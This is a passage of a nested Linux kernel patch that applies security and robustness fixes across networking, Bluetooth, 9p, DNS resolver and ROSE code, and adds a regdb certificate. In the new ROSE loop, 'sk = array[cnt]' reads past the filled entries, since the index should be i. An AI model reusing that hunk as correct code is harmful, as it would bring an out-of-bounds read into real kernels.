++ * With CONFIG_KASAN_INLINE, accesses to bogus pointers (outside the high
+  * canonical half of the address space) cause out-of-bounds shadow memory reads
+  * before the actual access. For addresses in the low canonical half of the
+  * address space, as well as most non-canonical addresses, that out-of-bounds
+@@ -560,3 +561,4 @@ void kasan_non_canonical_hook(unsigned long addr)
+ 	pr_alert("KASAN: %s in range [0x%016lx-0x%016lx]\n", bug_type,
+ 		 orig_addr, orig_addr + KASAN_GRANULE_SIZE - 1);
+ }
++#endif
+diff --git a/net/8021q/vlan_core.c b/net/8021q/vlan_core.c
+index 0beb44f2fe1f0..f001582345052 100644
+--- a/net/8021q/vlan_core.c
++++ b/net/8021q/vlan_core.c
+@@ -407,6 +407,8 @@ int vlan_vids_add_by_dev(struct net_device *dev,
+ 		return 0;
+ 
+ 	list_for_each_entry(vid_info, &vlan_info->vid_list, list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		err = vlan_vid_add(dev, vid_info->proto, vid_info->vid);
+ 		if (err)
+ 			goto unwind;
+@@ -417,6 +419,8 @@ unwind:
+ 	list_for_each_entry_continue_reverse(vid_info,
+ 					     &vlan_info->vid_list,
+ 					     list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		vlan_vid_del(dev, vid_info->proto, vid_info->vid);
+ 	}
+ 
+@@ -436,8 +440,11 @@ void vlan_vids_del_by_dev(struct net_device *dev,
+ 	if (!vlan_info)
+ 		return;
+ 
+-	list_for_each_entry(vid_info, &vlan_info->vid_list, list)
++	list_for_each_entry(vid_info, &vlan_info->vid_list, list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		vlan_vid_del(dev, vid_info->proto, vid_info->vid);
++	}
+ }
+ EXPORT_SYMBOL(vlan_vids_del_by_dev);
+ 
+diff --git a/net/9p/protocol.c b/net/9p/protocol.c
+index 4e3a2a1ffcb3f..0e6603b1ec906 100644
+--- a/net/9p/protocol.c
++++ b/net/9p/protocol.c
+@@ -394,6 +394,8 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 				uint16_t *nwname = va_arg(ap, uint16_t *);
+ 				char ***wnames = va_arg(ap, char ***);
+ 
++				*wnames = NULL;
++
+ 				errcode = p9pdu_readf(pdu, proto_version,
+ 								"w", nwname);
+ 				if (!errcode) {
+@@ -403,6 +405,8 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 							  GFP_NOFS);
+ 					if (!*wnames)
+ 						errcode = -ENOMEM;
++					else
++						(*wnames)[0] = NULL;
+ 				}
+ 
+ 				if (!errcode) {
+@@ -414,8 +418,10 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 								proto_version,
+ 								"s",
+ 								&(*wnames)[i]);
+-						if (errcode)
++						if (errcode) {
++							(*wnames)[i] = NULL;
+ 							break;
++						}
+ 					}
+ 				}
+ 
+@@ -423,11 +429,14 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 					if (*wnames) {
+ 						int i;
+ 
+-						for (i = 0; i < *nwname; i++)
++						for (i = 0; i < *nwname; i++) {
++							if (!(*wnames)[i])
++								break;
+ 							kfree((*wnames)[i]);
++						}
++						kfree(*wnames);
++						*wnames = NULL;
+ 					}
+-					kfree(*wnames);
+-					*wnames = NULL;
+ 				}
+ 			}
+ 			break;
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index 1c3c7ff5c3c66..f1b7510359e4b 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -264,11 +264,14 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	if (flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
++	lock_sock(sk);
++
+ 	skb = skb_recv_datagram(sk, flags, &err);
+ 	if (!skb) {
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+-			return 0;
++			err = 0;
+ 
++		release_sock(sk);
+ 		return err;
+ 	}
+ 
+@@ -294,6 +297,8 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
++	release_sock(sk);
++
+ 	if (flags & MSG_TRUNC)
+ 		copied = skblen;
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index c86a45344fe28..dcb13c64e8e7c 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -515,6 +515,9 @@ static u8 hci_cc_read_class_of_dev(struct hci_dev *hdev, void *data,
+ {
+ 	struct hci_rp_read_class_of_dev *rp = data;
+ 
++	if (WARN_ON(!hdev))
++		return HCI_ERROR_UNSPECIFIED;
++
+ 	bt_dev_dbg(hdev, "status 0x%2.2x", rp->status);
+ 
+ 	if (rp->status)
+@@ -746,9 +749,23 @@ static u8 hci_cc_read_enc_key_size(struct hci_dev *hdev, void *data,
+ 	} else {
+ 		conn->enc_key_size = rp->key_size;
+ 		status = 0;
++
++		if (conn->enc_key_size < hdev->min_enc_key_size) {
++			/* As slave role, the conn->state has been set to
++			 * BT_CONNECTED and l2cap conn req might not be received
++			 * yet, at this moment the l2cap layer almost does
++			 * nothing with the non-zero status.
++			 * So we also clear encrypt related bits, and then the
++			 * handler of l2cap conn req will get the right secure
++			 * state at a later time.
++			 */
++			status = HCI_ERROR_AUTH_FAILURE;
++			clear_bit(HCI_CONN_ENCRYPT, &conn->flags);
++			clear_bit(HCI_CONN_AES_CCM, &conn->flags);
++		}
+ 	}
+ 
+-	hci_encrypt_cfm(conn, 0);
++	hci_encrypt_cfm(conn, status);
+ 
+ done:
+ 	hci_dev_unlock(hdev);
+@@ -2298,7 +2315,8 @@ static void hci_cs_inquiry(struct hci_dev *hdev, __u8 status)
+ 		return;
+ 	}
+ 
+-	set_bit(HCI_INQUIRY, &hdev->flags);
++	if (hci_sent_cmd_data(hdev, HCI_OP_INQUIRY))
++		set_bit(HCI_INQUIRY, &hdev->flags);
+ }
+ 
+ static void hci_cs_create_conn(struct hci_dev *hdev, __u8 status)
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a7899857aee5d..4c5793053393f 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6493,6 +6493,14 @@ drop:
+ 	kfree_skb(skb);
+ }
+ 
++static inline void l2cap_sig_send_rej(struct l2cap_conn *conn, u16 ident)
++{
++	struct l2cap_cmd_rej_unk rej;
++
++	rej.reason = cpu_to_le16(L2CAP_REJ_NOT_UNDERSTOOD);
++	l2cap_send_cmd(conn, ident, L2CAP_COMMAND_REJ, sizeof(rej), &rej);
++}
++
+ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 				     struct sk_buff *skb)
+ {
+@@ -6518,23 +6526,24 @@ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 
+ 		if (len > skb->len || !cmd->ident) {
+ 			BT_DBG("corrupted command");
++			l2cap_sig_send_rej(conn, cmd->ident);
+ 			break;
+ 		}
+ 
+ 		err = l2cap_bredr_sig_cmd(conn, cmd, len, skb->data);
+ 		if (err) {
+-			struct l2cap_cmd_rej_unk rej;
+-
+ 			BT_ERR("Wrong link type (%d)", err);
+-
+-			rej.reason = cpu_to_le16(L2CAP_REJ_NOT_UNDERSTOOD);
+-			l2cap_send_cmd(conn, cmd->ident, L2CAP_COMMAND_REJ,
+-				       sizeof(rej), &rej);
++			l2cap_sig_send_rej(conn, cmd->ident);
+ 		}
+ 
+ 		skb_pull(skb, len);
+ 	}
+ 
++	if (skb->len > 0) {
++		BT_DBG("corrupted command");
++		l2cap_sig_send_rej(conn, 0);
++	}
++
+ drop:
+ 	kfree_skb(skb);
+ }
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index d2e8565d0b33f..6d631a2e60166 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2883,7 +2883,8 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_link_key_info *key = &cp->keys[i];
+ 
+-		if (key->addr.type != BDADDR_BREDR || key->type > 0x08)
++		/* Considering SMP over BREDR/LE, there is no need to check addr_type */
++		if (key->type > 0x08)
+ 			return mgmt_cmd_status(sk, hdev->id,
+ 					       MGMT_OP_LOAD_LINK_KEYS,
+ 					       MGMT_STATUS_INVALID_PARAMS);
+@@ -7129,6 +7130,7 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 
+ 	for (i = 0; i < irk_count; i++) {
+ 		struct mgmt_irk_info *irk = &cp->irks[i];
++		u8 addr_type = le_addr_type(irk->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_IRK,
+@@ -7138,8 +7140,12 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 			continue;
+ 		}
+ 
++		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
++		if (irk->addr.type == BDADDR_BREDR)
++			addr_type = BDADDR_BREDR;
++
+ 		hci_add_irk(hdev, &irk->addr.bdaddr,
+-			    le_addr_type(irk->addr.type), irk->val,
++			    addr_type, irk->val,
+ 			    BDADDR_ANY);
+ 	}
+ 
+@@ -7220,6 +7226,7 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_ltk_info *key = &cp->keys[i];
+ 		u8 type, authenticated;
++		u8 addr_type = le_addr_type(key->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_LTK,
+@@ -7254,8 +7261,12 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
++		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
++		if (key->addr.type == BDADDR_BREDR)
++			addr_type = BDADDR_BREDR;
++
+ 		hci_add_ltk(hdev, &key->addr.bdaddr,
+-			    le_addr_type(key->addr.type), type, authenticated,
++			    addr_type, type, authenticated,
+ 			    key->val, key->enc_size, key->ediv, key->rand);
+ 	}
+ 
+@@ -9523,7 +9534,7 @@ void mgmt_new_link_key(struct hci_dev *hdev, struct link_key *key,
+ 
+ 	ev.store_hint = persistent;
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = BDADDR_BREDR;
++	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
+ 	ev.key.type = key->type;
+ 	memcpy(ev.key.val, key->val, HCI_LINK_KEY_SIZE);
+ 	ev.key.pin_len = key->pin_len;
+@@ -9574,7 +9585,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent)
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(LE_LINK, key->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
+ 	ev.key.type = mgmt_ltk_type(key);
+ 	ev.key.enc_size = key->enc_size;
+ 	ev.key.ediv = key->ediv;
+@@ -9603,7 +9614,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk, bool persistent)
+ 
+ 	bacpy(&ev.rpa, &irk->rpa);
+ 	bacpy(&ev.irk.addr.bdaddr, &irk->bdaddr);
+-	ev.irk.addr.type = link_to_bdaddr(LE_LINK, irk->addr_type);
++	ev.irk.addr.type = link_to_bdaddr(irk->link_type, irk->addr_type);
+ 	memcpy(ev.irk.val, irk->val, sizeof(irk->val));
+ 
+ 	mgmt_event(MGMT_EV_NEW_IRK, hdev, &ev, sizeof(ev), NULL);
+@@ -9632,7 +9643,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk,
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &csrk->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(LE_LINK, csrk->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(csrk->link_type, csrk->bdaddr_type);
+ 	ev.key.type = csrk->type;
+ 	memcpy(ev.key.val, csrk->val, sizeof(csrk->val));
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index 70663229b3cc9..ecb005bce65ac 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -1058,6 +1058,7 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->remote_irk) {
++		smp->remote_irk->link_type = hcon->type;
+ 		mgmt_new_irk(hdev, smp->remote_irk, persistent);
+ 
+ 		/* Now that user space can be considered to know the
+@@ -1072,24 +1073,28 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->csrk) {
++		smp->csrk->link_type = hcon->type;
+ 		smp->csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->csrk, persistent);
+ 	}
+ 
+ 	if (smp->responder_csrk) {
++		smp->responder_csrk->link_type = hcon->type;
+ 		smp->responder_csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->responder_csrk, persistent);
+ 	}
+ 
+ 	if (smp->ltk) {
++		smp->ltk->link_type = hcon->type;
+ 		smp->ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->ltk, persistent);
+ 	}
+ 
+ 	if (smp->responder_ltk) {
++		smp->responder_ltk->link_type = hcon->type;
+ 		smp->responder_ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->responder_ltk, persistent);
+@@ -1109,6 +1114,8 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 		key = hci_add_link_key(hdev, smp->conn->hcon, &hcon->dst,
+ 				       smp->link_key, type, 0, &persistent);
+ 		if (key) {
++			key->link_type = hcon->type;
++			key->bdaddr_type = hcon->dst_type;
+ 			mgmt_new_link_key(hdev, key, persistent);
+ 
+ 			/* Don't keep debug keys around if the relevant
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 0d5aa820fd830..0a5566b6f8a25 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3551,6 +3551,9 @@ static netdev_features_t gso_features_check(const struct sk_buff *skb,
+ 	if (gso_segs > READ_ONCE(dev->gso_max_segs))
+ 		return features & ~NETIF_F_GSO_MASK;
+ 
++	if (unlikely(skb->len >= READ_ONCE(dev->gso_max_size)))
++		return features & ~NETIF_F_GSO_MASK;
++
+ 	if (!skb_shinfo(skb)->gso_type) {
+ 		skb_warn_bad_offload(skb);
+ 		return features & ~NETIF_F_GSO_MASK;
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 051aa71a8ad0f..30e7deff4c551 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -79,7 +79,7 @@ int sk_stream_wait_connect(struct sock *sk, long *timeo_p)
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending--;
+ 	} while (!done);
+-	return 0;
++	return done < 0 ? done : 0;
+ }
+ EXPORT_SYMBOL(sk_stream_wait_connect);
+ 
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 3aced951d5ab8..03f8f33dc134c 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -91,6 +91,7 @@ const struct cred *dns_resolver_cache;
+ static int
+ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ {
++	const struct dns_server_list_v1_header *v1;
+ 	const struct dns_payload_header *bin;
+ 	struct user_key_payload *upayload;
+ 	unsigned long derrno;
+@@ -122,6 +123,13 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 			return -EINVAL;
+ 		}
+ 
++		v1 = (const struct dns_server_list_v1_header *)bin;
++		if ((v1->status != DNS_LOOKUP_GOOD &&
++		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD)) {
++			if (prep->expiry == TIME64_MAX)
++				prep->expiry = ktime_get_real_seconds() + 1;
++		}
++
+ 		result_len = datalen;
+ 		goto store_result;
+ 	}
+@@ -314,7 +322,7 @@ static long dns_resolver_read(const struct key *key,
+ 
+ struct key_type key_type_dns_resolver = {
+ 	.name		= "dns_resolver",
+-	.flags		= KEY_TYPE_NET_DOMAIN,
++	.flags		= KEY_TYPE_NET_DOMAIN | KEY_TYPE_INSTANT_REAP,
+ 	.preparse	= dns_resolver_preparse,
+ 	.free_preparse	= dns_resolver_free_preparse,
+ 	.instantiate	= generic_key_instantiate,
+diff --git a/net/ife/ife.c b/net/ife/ife.c
+index 13bbf8cb6a396..be05b690b9ef2 100644
+--- a/net/ife/ife.c
++++ b/net/ife/ife.c
+@@ -82,6 +82,7 @@ void *ife_decode(struct sk_buff *skb, u16 *metalen)
+ 	if (unlikely(!pskb_may_pull(skb, total_pull)))
+ 		return NULL;
+ 
++	ifehdr = (struct ifeheadr *)(skb->data + skb->dev->hard_header_len);
+ 	skb_set_mac_header(skb, total_pull);
+ 	__skb_pull(skb, total_pull);
+ 	*metalen = ifehdrln - IFE_METAHDRLEN;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 2ca442f485132..a2c4866080bd7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1694,10 +1694,10 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					  lockdep_is_held(&local->sta_mtx));
+ 
+ 	/*
+-	 * If there are no changes, then accept a link that doesn't exist,
++	 * If there are no changes, then accept a link that exist,
+ 	 * unless it's a new link.
+ 	 */
+-	if (params->link_id < 0 && !new_link &&
++	if (params->link_id >= 0 && !new_link &&
+ 	    !params->link_mac && !params->txpwr_set &&
+ 	    !params->supported_rates_len &&
+ 	    !params->ht_capa && !params->vht_capa &&
+diff --git a/net/mac80211/mesh_plink.c b/net/mac80211/mesh_plink.c
+index bd0b7c189adfa..711c3377f428b 100644
+--- a/net/mac80211/mesh_plink.c
++++ b/net/mac80211/mesh_plink.c
+@@ -1051,8 +1051,8 @@ mesh_plink_get_event(struct ieee80211_sub_if_data *sdata,
+ 	case WLAN_SP_MESH_PEERING_OPEN:
+ 		if (!matches_local)
+ 			event = OPN_RJCT;
+-		if (!mesh_plink_free_count(sdata) ||
+-		    (sta->mesh->plid && sta->mesh->plid != plid))
++		else if (!mesh_plink_free_count(sdata) ||
++			 (sta->mesh->plid && sta->mesh->plid != plid))
+ 			event = OPN_IGNR;
+ 		else
+ 			event = OPN_ACPT;
+@@ -1060,9 +1060,9 @@ mesh_plink_get_event(struct ieee80211_sub_if_data *sdata,
+ 	case WLAN_SP_MESH_PEERING_CONFIRM:
+ 		if (!matches_local)
+ 			event = CNF_RJCT;
+-		if (!mesh_plink_free_count(sdata) ||
+-		    sta->mesh->llid != llid ||
+-		    (sta->mesh->plid && sta->mesh->plid != plid))
++		else if (!mesh_plink_free_count(sdata) ||
++			 sta->mesh->llid != llid ||
++			 (sta->mesh->plid && sta->mesh->plid != plid))
+ 			event = CNF_IGNR;
+ 		else
+ 			event = CNF_ACPT;
+@@ -1230,6 +1230,8 @@ void mesh_rx_plink_frame(struct ieee80211_sub_if_data *sdata,
+ 			return;
+ 	}
+ 	elems = ieee802_11_parse_elems(baseaddr, len - baselen, true, NULL);
+-	mesh_process_plink_frame(sdata, mgmt, elems, rx_status);
+-	kfree(elems);
++	if (elems) {
++		mesh_process_plink_frame(sdata, mgmt, elems, rx_status);
++		kfree(elems);
++	}
+ }
+diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c
+index 2cc95c8dc4c7b..f74baefd855d3 100644
+--- a/net/rfkill/rfkill-gpio.c
++++ b/net/rfkill/rfkill-gpio.c
+@@ -116,6 +116,14 @@ static int rfkill_gpio_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
++	ret = gpiod_direction_output(rfkill->reset_gpio, true);
++	if (ret)
++		return ret;
++
++	ret = gpiod_direction_output(rfkill->shutdown_gpio, true);
++	if (ret)
++		return ret;
++
+ 	rfkill->rfkill_dev = rfkill_alloc(rfkill->name, &pdev->dev,
+ 					  rfkill->type, &rfkill_gpio_ops,
+ 					  rfkill);
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index 674937284b8d2..29b74a569e0b0 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -182,21 +182,47 @@ void rose_kill_by_neigh(struct rose_neigh *neigh)
+  */
+ static void rose_kill_by_device(struct net_device *dev)
+ {
+-	struct sock *s;
++	struct sock *sk, *array[16];
++	struct rose_sock *rose;
++	bool rescan;
++	int i, cnt;
+ 
++start:
++	rescan = false;
++	cnt = 0;
+ 	spin_lock_bh(&rose_list_lock);
+-	sk_for_each(s, &rose_list) {
+-		struct rose_sock *rose = rose_sk(s);
++	sk_for_each(sk, &rose_list) {
++		rose = rose_sk(sk);
++		if (rose->device == dev) {
++			if (cnt == ARRAY_SIZE(array)) {
++				rescan = true;
++				break;
++			}
++			sock_hold(sk);
++			array[cnt++] = sk;
++		}
++	}
++	spin_unlock_bh(&rose_list_lock);
+ 
++	for (i = 0; i < cnt; i++) {
++		sk = array[cnt];
++		rose = rose_sk(sk);
++		lock_sock(sk);
++		spin_lock_bh(&rose_list_lock);
+ 		if (rose->device == dev) {
+-			rose_disconnect(s, ENETUNREACH, ROSE_OUT_OF_ORDER, 0);
++			rose_disconnect(sk, ENETUNREACH, ROSE_OUT_OF_ORDER, 0);
+ 			if (rose->neighbour)
+ 				rose->neighbour->use--;
+ 			netdev_put(rose->device, &rose->dev_tracker);
+ 			rose->device = NULL;
+ 		}
++		spin_unlock_bh(&rose_list_lock);
++		release_sock(sk);
++		sock_put(sk);
++		cond_resched();
+ 	}
+-	spin_unlock_bh(&rose_list_lock);
++	if (rescan)
++		goto start;
+ }
+ 
+ /*
+@@ -656,7 +682,10 @@ static int rose_release(struct socket *sock)
+ 		break;
+ 	}
+ 
++	spin_lock_bh(&rose_list_lock);
+ 	netdev_put(rose->device, &rose->dev_tracker);
++	rose->device = NULL;
++	spin_unlock_bh(&rose_list_lock);
+ 	sock->sk = NULL;
+ 	release_sock(sk);
+ 	sock_put(sk);
+diff --git a/net/wireless/certs/wens.hex b/net/wireless/certs/wens.hex
+new file mode 100644
+index 0000000000000..0d50369bede98
+--- /dev/null
++++ b/net/wireless/certs/wens.hex
+@@ -0,0 +1,87 @@
++/* Chen-Yu Tsai's regdb certificate */
++0x30, 0x82, 0x02, 0xa7, 0x30, 0x82, 0x01, 0x8f,
++0x02, 0x14, 0x61, 0xc0, 0x38, 0x65, 0x1a, 0xab,
++0xdc, 0xf9, 0x4b, 0xd0, 0xac, 0x7f, 0xf0, 0x6c,
++0x72, 0x48, 0xdb, 0x18, 0xc6, 0x00, 0x30, 0x0d,
++0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d,
++0x01, 0x01, 0x0b, 0x05, 0x00, 0x30, 0x0f, 0x31,
++0x0d, 0x30, 0x0b, 0x06, 0x03, 0x55, 0x04, 0x03,
++0x0c, 0x04, 0x77, 0x65, 0x6e, 0x73, 0x30, 0x20,
++0x17, 0x0d, 0x32, 0x33, 0x31, 0x32, 0x30, 0x31,
++0x30, 0x37, 0x34, 0x31, 0x31, 0x34, 0x5a, 0x18,
++0x0f, 0x32, 0x31, 0x32, 0x33, 0x31, 0x31, 0x30,
++0x37, 0x30, 0x37, 0x34, 0x31, 0x31, 0x34, 0x5a,
++0x30, 0x0f, 0x31, 0x0d, 0x30, 0x0b, 0x06, 0x03,
++0x55, 0x04, 0x03, 0x0c, 0x04, 0x77, 0x65, 0x6e,
++0x73, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0d, 0x06,
++0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01,
++0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0f,
++0x00, 0x30, 0x82, 0x01, 0x0a, 0x02, 0x82, 0x01,
++0x01, 0x00, 0xa9, 0x7a, 0x2c, 0x78, 0x4d, 0xa7,
++0x19, 0x2d, 0x32, 0x52, 0xa0, 0x2e, 0x6c, 0xef,
++0x88, 0x7f, 0x15, 0xc5, 0xb6, 0x69, 0x54, 0x16,
++0x43, 0x14, 0x79, 0x53, 0xb7, 0xae, 0x88, 0xfe,
++0xc0, 0xb7, 0x5d, 0x47, 0x8e, 0x1a, 0xe1, 0xef,
++0xb3, 0x90, 0x86, 0xda, 0xd3, 0x64, 0x81, 0x1f,
++0xce, 0x5d, 0x9e, 0x4b, 0x6e, 0x58, 0x02, 0x3e,
++0xb2, 0x6f, 0x5e, 0x42, 0x47, 0x41, 0xf4, 0x2c,
++0xb8, 0xa8, 0xd4, 0xaa, 0xc0, 0x0e, 0xe6, 0x48,
++0xf0, 0xa8, 0xce, 0xcb, 0x08, 0xae, 0x37, 0xaf,
++0xf6, 0x40, 0x39, 0xcb, 0x55, 0x6f, 0x5b, 0x4f,
++0x85, 0x34, 0xe6, 0x69, 0x10, 0x50, 0x72, 0x5e,
++0x4e, 0x9d, 0x4c, 0xba, 0x38, 0x36, 0x0d, 0xce,
++0x73, 0x38, 0xd7, 0x27, 0x02, 0x2a, 0x79, 0x03,
++0xe1, 0xac, 0xcf, 0xb0, 0x27, 0x85, 0x86, 0x93,
++0x17, 0xab, 0xec, 0x42, 0x77, 0x37, 0x65, 0x8a,
++0x44, 0xcb, 0xd6, 0x42, 0x93, 0x92, 0x13, 0xe3,
++0x39, 0x45, 0xc5, 0x6e, 0x00, 0x4a, 0x7f, 0xcb,
++0x42, 0x17, 0x2b, 0x25, 0x8c, 0xb8, 0x17, 0x3b,
++0x15, 0x36, 0x59, 0xde, 0x42, 0xce, 0x21, 0xe6,
++0xb6, 0xc7, 0x6e, 0x5e, 0x26, 0x1f, 0xf7, 0x8a,
++0x57, 0x9e, 0xa5, 0x96, 0x72, 0xb7, 0x02, 0x32,
++0xeb, 0x07, 0x2b, 0x73, 0xe2, 0x4f, 0x66, 0x58,
++0x9a, 0xeb, 0x0f, 0x07, 0xb6, 0xab, 0x50, 0x8b,
++0xc3, 0x8f, 0x17, 0xfa, 0x0a, 0x99, 0xc2, 0x16,
++0x25, 0xbf, 0x2d, 0x6b, 0x1a, 0xaa, 0xe6, 0x3e,
++0x5f, 0xeb, 0x6d, 0x9b, 0x5d, 0x4d, 0x42, 0x83,
++0x2d, 0x39, 0xb8, 0xc9, 0xac, 0xdb, 0x3a, 0x91,
++0x50, 0xdf, 0xbb, 0xb1, 0x76, 0x6d, 0x15, 0x73,
++0xfd, 0xc6, 0xe6, 0x6b, 0x71, 0x9e, 0x67, 0x36,
++0x22, 0x83, 0x79, 0xb1, 0xd6, 0xb8, 0x84, 0x52,
++0xaf, 0x96, 0x5b, 0xc3, 0x63, 0x02, 0x4e, 0x78,
++0x70, 0x57, 0x02, 0x03, 0x01, 0x00, 0x01, 0x30,
++0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7,
++0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x03, 0x82,
++0x01, 0x01, 0x00, 0x24, 0x28, 0xee, 0x22, 0x74,
++0x7f, 0x7c, 0xfa, 0x6c, 0x1f, 0xb3, 0x18, 0xd1,
++0xc2, 0x3d, 0x7d, 0x29, 0x42, 0x88, 0xad, 0x82,
++0xa5, 0xb1, 0x8a, 0x05, 0xd0, 0xec, 0x5c, 0x91,
++0x20, 0xf6, 0x82, 0xfd, 0xd5, 0x67, 0x60, 0x5f,
++0x31, 0xf5, 0xbd, 0x88, 0x91, 0x70, 0xbd, 0xb8,
++0xb9, 0x8c, 0x88, 0xfe, 0x53, 0xc9, 0x54, 0x9b,
++0x43, 0xc4, 0x7a, 0x43, 0x74, 0x6b, 0xdd, 0xb0,
++0xb1, 0x3b, 0x33, 0x45, 0x46, 0x78, 0xa3, 0x1c,
++0xef, 0x54, 0x68, 0xf7, 0x85, 0x9c, 0xe4, 0x51,
++0x6f, 0x06, 0xaf, 0x81, 0xdb, 0x2a, 0x7b, 0x7b,
++0x6f, 0xa8, 0x9c, 0x67, 0xd8, 0xcb, 0xc9, 0x91,
++0x40, 0x00, 0xae, 0xd9, 0xa1, 0x9f, 0xdd, 0xa6,
++0x43, 0x0e, 0x28, 0x7b, 0xaa, 0x1b, 0xe9, 0x84,
++0xdb, 0x76, 0x64, 0x42, 0x70, 0xc9, 0xc0, 0xeb,
++0xae, 0x84, 0x11, 0x16, 0x68, 0x4e, 0x84, 0x9e,
++0x7e, 0x92, 0x36, 0xee, 0x1c, 0x3b, 0x08, 0x63,
++0xeb, 0x79, 0x84, 0x15, 0x08, 0x9d, 0xaf, 0xc8,
++0x9a, 0xc7, 0x34, 0xd3, 0x94, 0x4b, 0xd1, 0x28,
++0x97, 0xbe, 0xd1, 0x45, 0x75, 0xdc, 0x35, 0x62,
++0xac, 0x1d, 0x1f, 0xb7, 0xb7, 0x15, 0x87, 0xc8,
++0x98, 0xc0, 0x24, 0x31, 0x56, 0x8d, 0xed, 0xdb,
